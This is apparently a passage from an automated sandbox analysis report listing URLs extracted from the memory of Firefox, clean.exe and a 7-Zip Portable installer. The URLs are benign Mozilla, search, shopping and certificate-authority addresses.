Source: firefox.exe, 00000011.00000003.2479110086.0000024368141000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2329123389.000002436813E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2347995544.0000024368141000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2423809946.000002435DED1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2312295341.000002435DED1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2495309169.000002435E0F8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2486881772.0000024368141000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2397264757.0000024368141000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 00000011.00000003.2448902266.000002435E0FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2495309169.000002435E0F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/firefox-relay-integration
Source: firefox.exe, 00000011.00000003.2413873750.000002436895F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2474832296.000002436895F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2496017415.000002435E06D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2479878785.00000243655B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: places.sqlite-wal.17.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 00000011.00000003.2470456832.00000243689D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2474549451.00000243689D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2413873750.00000243689D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaPlatformDecoderNotFound
Source: firefox.exe, 00000011.00000003.2470456832.00000243689D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2474549451.00000243689D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2413873750.00000243689D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaWMFNeeded
Source: firefox.exe, 00000011.00000003.2376896050.000002435EED7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 00000011.00000003.2329912010.00000243633D0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2487444856.00000243633D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings2
Source: places.sqlite-wal.17.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: firefox.exe, 00000011.00000003.2400573242.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2380446020.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2427444409.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2305816782.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2374374159.0000024363830000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 00000011.00000003.2413873750.00000243689D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 00000011.00000003.2413873750.00000243689D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 00000011.00000003.2413873750.00000243689D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 00000011.00000003.2413873750.00000243689D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 00000011.00000003.2397264757.00000243681DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2477674869.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2476828386.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2326619496.0000024368363000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: firefox.exe, 00000011.00000003.2487551787.000002436336A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2329912010.000002436336A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://upjv.info
Source: firefox.exe, 00000011.00000003.2492956295.000002435E463000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2332689238.000002435E463000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2486020064.000002435E463000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://upjv.info/
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 00000011.00000003.2449029556.000002435E0EA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2495445273.000002435E0EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://watch.sling.com/
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 00000011.00000003.2481936753.0000024365361000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2419798569.0000024365361000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: firefox.exe, 00000011.00000003.2314766216.0000024368ACD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2444720249.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2315959898.00000243638B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2481127797.0000024365413000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2477674869.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2476828386.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2326619496.0000024368363000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weibo.com/
Source: firefox.exe, 00000011.00000003.2400573242.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2380446020.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2305170781.0000024363831000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2427444409.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2305816782.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2374374159.0000024363830000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: clean.exe, 00000005.00000003.2151715946.0000000002FBD000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.7-zip.org/
Source: clean.exe, 00000005.00000003.2151715946.0000000002FBD000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.7-zip.org/faq.html
Source: clean.exe, 00000005.00000003.2151715946.0000000002FBD000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.7-zip.org/support.html
Source: firefox.exe, 00000011.00000003.2475632988.00000243684CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2347089065.00000243684B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2326229478.00000243684B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2470762903.00000243684D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2418178684.00000243684B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2320965039.000002435C167000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 00000011.00000003.2475632988.00000243684CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2347089065.00000243684B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2326229478.00000243684B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2470762903.00000243684D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2418178684.00000243684B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.ca/
Source: firefox.exe, 00000011.00000003.2314766216.0000024368ACD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2444720249.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2315959898.00000243638B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2477674869.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2320965039.000002435C167000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2476828386.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2326619496.0000024368363000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.co.uk/
Source: firefox.exe, 00000011.00000003.2329837515.0000024368108000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2477674869.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2476828386.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2326619496.0000024368363000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/
Source: firefox.exe, 00000014.00000002.3339591404.000001F5277C8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3338371718.00000184C72EB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3342601193.0000025EFE703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: firefox.exe, 00000011.00000003.2329912010.000002436336A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 00000011.00000003.2475632988.00000243684CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2347089065.00000243684B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2326229478.00000243684B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2470762903.00000243684D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2418178684.00000243684B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.de/
Source: firefox.exe, 00000011.00000003.2475632988.00000243684CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2347089065.00000243684B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2326229478.00000243684B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2470762903.00000243684D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2418178684.00000243684B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.fr/
Source: firefox.exe, 00000011.00000003.2444720249.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2477674869.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2476828386.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2326619496.0000024368363000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 00000011.00000003.2444720249.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2477674869.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2476828386.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2326619496.0000024368363000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.baidu.com/
Source: firefox.exe, 00000011.00000003.2444720249.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2477674869.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2476828386.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2326619496.0000024368363000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bbc.co.uk/
Source: firefox.exe, 00000014.00000002.3339591404.000001F5277C8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3338371718.00000184C72EB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3342601193.0000025EFE703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: firefox.exe, 00000011.00000003.2444720249.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2477674869.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2476828386.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2326619496.0000024368363000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ctrip.com/
Source: firefox.exe, 00000011.00000003.2500989572.00000243577AA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2503197731.00000243577AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: firefox.exe, 00000011.00000003.2444720249.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2477674869.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2476828386.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2326619496.0000024368363000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.co.uk/
Source: firefox.exe, 00000011.00000003.2475632988.00000243684CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2347089065.00000243684B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2326229478.00000243684B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2470762903.00000243684D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2418178684.00000243684B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.de/
Source: clean.exe, 00000005.00000003.2156488353.000000000425A000.00000004.00001000.00020000.00000000.sdmp, 7-ZipPortable.exe.5.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: clean.exe, 00000005.00000003.2156488353.000000000425A000.00000004.00001000.00020000.00000000.sdmp, 7-ZipPortable.exe.5.dr String found in binary or memory: https://www.globalsign.com/repository/06
Source: firefox.exe, 00000011.00000003.2444720249.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2477674869.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2476828386.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2326619496.0000024368363000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: firefox.exe, 00000011.00000003.2444720249.0000024368334000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/
Source: firefox.exe, 00000011.00000003.2304107836.0000024365882000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2305330840.0000024368A98000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2320965039.000002435C167000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 00000011.00000003.2260044945.000002435B750000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2259914575.000002435B736000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2259756769.000002435B71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2260165444.000002435B76B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2260276730.000002435B783000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2259618778.0000024359200000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: firefox.exe, 00000011.00000003.2320965039.000002435C167000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/searchc1a6845f-015e-4e67-bc64-6e39a843643fa3f1a5b6-cd8d-41b3-bb2b-de
Source: firefox.exe, 00000011.00000003.2373135369.000002435C82B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2260044945.000002435B750000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2259914575.000002435B736000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2398550205.000002435E0F8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2448902266.000002435E0F7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2259756769.000002435B71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2260165444.000002435B76B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2329123389.000002436813E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2347995544.0000024368141000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2260276730.000002435B783000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2495309169.000002435E0F8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2397264757.0000024368141000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2259618778.0000024359200000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2320965039.000002435C167000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000011.00000003.2347089065.0000024368482000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2320965039.000002435C167000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 00000011.00000003.2444720249.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2477674869.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2476828386.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2326619496.0000024368363000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 00000011.00000003.2314766216.0000024368ACD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2444720249.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2315959898.00000243638B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2477674869.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2476828386.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2326619496.0000024368363000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 00000011.00000003.2444720249.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2477674869.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2320965039.000002435C167000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2476828386.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2326619496.0000024368363000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.leboncoin.fr/
Source: places.sqlite-wal.17.dr String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: places.sqlite-wal.17.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: firefox.exe, 00000011.00000003.2322644746.000002435C074000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2325769645.000002435DFB4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2322644746.000002435C08C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2323589912.000002435C071000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: places.sqlite-wal.17.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: firefox.exe, 00000011.00000003.2448902266.000002435E0FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2495309169.000002435E0F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/about/legal/terms/subscription-services/
Source: firefox.exe, 00000011.00000003.2495626539.000002435E0AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: firefox.exe, 00000011.00000003.2397264757.00000243681D4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2471726860.00000243681D4000.00000004.00000800.00020000.00000000.sdmp, places.sqlite-wal.17.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
